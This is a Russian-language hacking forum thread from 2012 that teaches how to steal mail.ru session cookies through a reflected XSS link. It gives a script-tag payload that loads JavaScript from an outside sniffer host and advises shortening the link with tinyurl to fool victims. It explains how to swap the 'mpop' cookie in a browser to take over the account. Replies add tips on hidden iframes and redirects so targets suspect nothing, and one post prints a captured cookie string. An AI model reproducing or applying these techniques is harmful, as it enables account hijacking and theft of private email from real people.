ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Взлом mail.ru с помощью пассивной xss (https://forum.antichat.xyz/showthread.php?t=8052243)

MOV_EAX 28.01.2012 01:00

Цитата:

Сообщение от tickhack

пока незнаю но уже думаю об этом.

молоток что нашел

а обойти тут нет труда
у меня приходят куки
снифер использовал свой приватный

code:

VID=209Pg10AjVWy; mrcu=FC724F225A1A30402A7D0100007F; p=EcMGAEp owAA; b=Bjw5BEAF5QAA8rMu8EbHAHB1gunYC2K2LhDmx2CCHgOCVwy TCw4C74AJHUCUjUMhOAxsGK9IFOtghQWC8iCJ0gpyACC8MLF3x l1oCbc7Z8QeQ3CP8QgxYsm9A2gcDcdxFXfGS3JJ1x2CLGLckhb thgJ90QEAABxF3/GvdgYfatBNLycsLguwruHCL8ZI2wNoJDiIEJPTRFxOUfsfBqRh 2jCITwQj/NBdKECUdp4Qj ECPtYIkzpGbE3gMKvuQjtPyccywEhvvwPKZ/ J5hsjTEA; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAQABBAIGAIAAAAAAAgAdAQgLtgcA; mid=62ad25d4; i=AQA98yNPAgACAAUCAQATAAgEARUAAQ==; mc1=1328280937; c=3/QjTwAAEBVpCAARAAgAHgAyAvcAAAAg; odklmapi=$$8SxEBds2OmrpriJjFY2wYhUEhlrqaWwOSsWt2CH Sy7SV=c; PHPSESSID=162802d913dd017b7aed594c9eae6836; __utma=103147462.1831527631.1327777722.1327777722. 1327777722.1; __utmb=103147462; __utmc=103147462; __utmz=103147462.1327777722.1.1.utmccn=(direct)|ut mcsr=(direct)|utmcmd=(none); __utma=1.1627511399.1327777729.1327777729.13277777 29.1; __utmb=1.4.10.1327777729; __utmc=1; __utmz=1.1327777729.1.1.utmcsr=(direct)|utmccn=(di rect)|utmcmd=(none); partner_session_day=28; partner_id=1_678_60738_0__

просто ставь таким образом скрипт

PHP highlight

Код:


       
Код:

       
http://наша_пасивка_адрес_где_поймали_хss/register.php?referrer=">





tickhack 28.01.2012 01:00

Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hpc.name/sniffer/
3.Мозги и руки !
Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
source:

Код:

%
3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"


мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/
заходим на этот сайт и где написано
source:

Код:

Enter
a
long URL
to
make tiny:


вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
source:

Код:

make
a
TinyURL


И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
ну чтож думаю всё !
→Видео к статье←
Пароль на видео hacker-pro.net
Автор:tickhack hacker-pro.net

Andorfin 28.01.2012 01:00

Спасибо!)Где бы еще пассивку взять..?)

dryha_777 28.01.2012 01:00

Я попробывал приходит emil а пароль нет почему ?

tickhack 28.01.2012 01:00

Цитата:

Сообщение от dryha_777

Я попробывал приходит emil а пароль нет почему ?

на сниффер придутут cokies их надо в опере поменять на свои но только не все только од строчки mpop до строчки мыло@mail.ru:
cokies меняют так настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы

tickhack 28.01.2012 01:00

Цитата:

Сообщение от Andorfin

Спасибо!)Где бы еще пассивку взять..?)

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
вот же она

Andorfin 28.01.2012 01:00

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

tickhack 28.01.2012 01:00

Цитата:

Сообщение от Andorfin

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

пока незнаю но уже думаю об этом.

dryha_777 29.01.2012 01:00

пароль какой на видео ? в архиве

Yorvet 29.01.2012 01:00

Дополню: если есть проблемы с настройкой снифера, используйте удобную программу "бабай".

sibrik 29.01.2012 01:00

Цитата:

Сообщение от dryha_777

пароль какой на видео ? в архиве

hacker-pro.net

petrovip86 29.01.2012 01:00

всё делаю по инсструкции но всеравно не преходят!!

bugagaga 29.01.2012 01:00

Цитата:

Сообщение от tickhack

на сниффер придутут cokies их надо в опере поменять на свои но только не все только од строчки mpop до строчки мыло@mail.ru:
cokies меняют так настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы

9 zdelal kak ti skazal potom 4e 9 ne ponel plz raskaji po podrobnee osobeno s cokies 9 zdelal vse i komne priwlo v snifer 9 postavil cokies potom 4e?

rox@hak 29.01.2012 01:00

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

RED_DEVIL_69 29.01.2012 01:00

Куки приходят, но зайти через них не получается( Так как только вставляешь Mpop => закрыть (пробовал через оперу) Всплывает окно с авторизацией)

tickhack 29.01.2012 01:00

Цитата:

Сообщение от rox@hak

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

Спасибо за совет попробую что нибуть придумать

tickhack 29.01.2012 01:00

Цитата:

Сообщение от RED_DEVIL_69

Куки приходят, но зайти через них не получается( Так как только вставляешь Mpop => закрыть (пробовал через оперу) Всплывает окно с авторизацией)

куки выглидат так 6325749802:4f015258665e2ef6150502190f1d081b0a014f6 c5150445e070f00050d1d000b03184b4c515958421c0e0d165 8505d5b174345:мыло@mail.ru: их ты должен вставить в опере как вставлять я уже объяснял

tickhack 29.01.2012 01:00

Цитата:

Сообщение от petrovip86

всё делаю по инсструкции но всеравно не преходят!!

попробуй ещё !

tickhack 29.01.2012 01:00

Не надо переходит по моей ядовитой ссылки ато мне уже надоело удалять ваши cokies с сниффера

bugagaga 29.01.2012 01:00

Цитата:

Сообщение от tickhack

Не надо переходит по моей ядовитой ссылки ато мне уже надоело удалять ваши cokies с сниффера

dai mne email ob9sni esli ne slojna

tickhack 29.01.2012 01:00

Цитата:

Сообщение от bugagaga

dai mne email ob9sni esli ne slojna

101023043 заходи в аську

bugagaga 29.01.2012 01:00

Цитата:

Сообщение от tickhack

101023043 заходи в аську

netu aski dai email ili je skype

Smile111 29.01.2012 01:00

скайп ya201010
icq 357698309
кто поможет отблагодарю

Smile111 29.01.2012 01:00

спасибо большое tickhack помог

tickhack 30.01.2012 01:00

Цитата:

Сообщение от Yorvet

Дополню: если есть проблемы с настройкой снифера, используйте удобную программу "бабай".

бабай не у всех работает , например у меня не работает

Yorvet 30.01.2012 01:00

1.2 не у всех. 1.0, по моим наблюдениям, у всех.

m744na 30.01.2012 01:00

tickhack,спасибо,все получается,куки приходят,НО...когда пытаешься перейти по яд.ссылке,выскакивает окошко

http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???

tickhack 30.01.2012 01:00

Цитата:

Сообщение от m744na

tickhack,спасибо,все получается,куки приходят,НО...когда пытаешься перейти по яд.ссылке,выскакивает окошко

http://s018.radikal.ru/i509/1201/76/8f4a56e8d991.gif

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

m744na 30.01.2012 01:00

Цитата:

Сообщение от tickhack

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

пример своей ссылки можешь сделать?

tickhack 30.01.2012 01:00

Цитата:

Сообщение от m744na

пример своей ссылки можешь сделать?

с редиректом ?

m744na 30.01.2012 01:00

дадада

tickhack 30.01.2012 01:00

Цитата:

Сообщение от m744na

дадада

установи сниффер м@з@хакера у него там есть ссылки с редиректом
вот ссылка на сниффер сниффер

Nick Hander 30.01.2012 01:00

вопрос первый,как это обойти? и вопрос второй,пример ссылочки с перенаправлением на др сайт можно???
Как обходятся такие вещи? Ищутся подобные, не слишком популярные сервисы по укорачиванию ссылок. Пользуются ими. Если же и там выскакивает, то можно зарегистрировать сайт на любом бесплатном хостинге (можно даже без php) и залить как главную страницу след. содержания

code:




Возможно, на некоторых особо популярных хостингах на всех доменах третьего уровня выскакивает подобное предупреждение. Тогда придется раскошелиться на домен второго уровня и на платный хостинг (займет макс 130 р.). Но легче найди какой-нибудь неизвестный системе забугорный бесплатный хостинг и там проделать подобное. А вообще, такие ссылки с переадресациями на пассивку умные люди не делают. Умные люди заманивают на страницу, в которой в скрытом фрейме спрятана пассивка, и через секунду перекидывают именно на ту страницу, что указана в письме. То есть пользователь и видит именно то, что хотел увидеть, и ничего сверхъестественного не подозревает. А куки тем временем у нас. крытый фрейм, если кто не помнит, задается так:

code:


А вообще люди, то, что вы сейчас делаете - неразумное баловство. Я ничего против ХSS не имею, но использовать ее надо с умом. Я уверен, так, как вы используете, взломаете лишь пятиклассника Васю Пупкина максимум. И то не факт. Готовить атаку надо с умом, чтобы жертва совсем ничего не заподозрила! Ни на какие tinyurl не надо ссылки давать, ссылка должна быть наименее палевная, желательно в виде домена второго уровня, пассивка должна быть на сто рядов спрятана в коде, желательно в каких-нибудь огромных файлах скриптом для главной странице в виде небольшой функции в середине кода, чтобы хрен кто ее нашел... Сниффер нужно устанавливать свой, на свой хостинг, ибо здешний сниффер палится антивирусами по домену. Само сообщение с пассивкой должно быть продумано и ставило сель заманить по ссылки, и пользователь затем бы видел то, что и ожидал увидеть. И ничего бы не заподозрил. А так вы только своими некачественными действиями тратите драгоценные пассивки, которых на mail.ru не очень много и ценятся они в тысячах рублей.

m744na 30.01.2012 01:00

tickhack,я потому и прошу пример ТВОЕЙ!!! ссылки,потому как не могу разобраться что и куда ...если используем редирект.

tickhack 30.01.2012 01:00

Цитата:

Сообщение от m744na

tickhack,я потому и прошу пример ТВОЕЙ!!! ссылки,потому как не могу разобраться что и куда ...если используем редирект.

тебе только что написали всё читай !

m744na 30.01.2012 01:00

Цитата:

Сообщение от Nick Hander

и через секунду перекидывают именно на ту страницу, что указана в письме.

вот и прошу пример полной ссылки с редиректом
Nick Hander,может ты подскажешь?

m744na 30.01.2012 01:00

ничерта редирект не получается(((((((((

m744na 30.01.2012 01:00

блин,ну подскажите пожалуйста как сюда

вставить редирект?спасибо

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

tickhack 30.01.2012 01:00

Цитата:

Сообщение от m744na

блин,ну подскажите пожалуйста как сюда

вставить редирект?спасибо

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Nick Hander 30.01.2012 01:00

m744na
Учи javascript, дружок. Формируй сам код для атаки, используя location.href - как перенаправления, а setTimeout() для ожидания.


Время: 23:34